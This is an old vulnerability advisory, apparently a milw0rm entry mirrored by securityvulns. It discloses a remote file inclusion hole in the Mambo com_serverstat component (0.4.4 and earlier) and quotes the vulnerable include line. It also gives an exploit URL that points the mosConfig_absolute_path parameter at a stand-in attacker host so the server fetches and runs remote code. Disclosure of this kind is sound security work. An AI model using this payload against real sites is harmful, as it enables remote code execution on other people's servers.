Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability

2006-09-14T00:00:00
ID SECURITYVULNS:DOC:14284
Type securityvulns
Reporter Securityvulns
Modified 2006-09-14T00:00:00

Description

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Author: xoron (turkish hacker) + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Class : Remote + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Vuln Code: require_once($mosConfig_absolute_path."/administrator/components/com_serverstat/config.serverstat.php"); + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Exploit: administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://evil_scripts? + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + Thanx : str0ke, Ironfist, Preddy, SHiKaA + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

milw0rm.com [2006-09-14]